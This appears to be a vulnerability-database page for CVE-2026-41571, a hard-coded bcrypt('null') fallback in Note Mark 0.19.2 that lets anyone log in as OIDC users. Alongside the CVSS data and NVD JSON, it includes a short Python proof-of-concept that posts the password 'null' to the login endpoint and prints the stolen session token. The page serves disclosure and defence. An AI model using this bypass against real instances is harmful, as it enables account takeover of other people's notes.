CVE-2026-41571

Description

Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: "null" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction. This issue has been patched in version 0.19.3.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Note Mark 0.19.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL for the internal login endpoint
target_url = "http://target-note-mark-url/api/login"

# Payload data
# OIDC users have empty passwords, but the app compares input against bcrypt("null")
payload = {
    "username": "victim_oidc_user",  # Username of the OIDC registered user
    "password": "null"               # Hardcoded fallback password
}

# Send POST request
response = requests.post(target_url, json=payload)

# Check if login was successful (HTTP 200 OK and session token)
if response.status_code == 200 and "session" in response.json():
    print("[+] Exploit successful! Account bypassed.")
    print(f"[+] Session token: {response.json().get('session')}")
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41571
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41571
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41571/
[4] VulDB https://vuldb.com/cve/CVE-2026-41571
[5] https://github.com/enchant97/note-mark/releases/tag/v0.19.3
[6] https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh
[7] https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41571", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:29.600", "lastModified": "2026-05-06T21:25:48.847", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt(\"null\") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: \"null\" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction. This issue has been patched in version 0.19.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh", "source": "[email protected]"}, {"url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}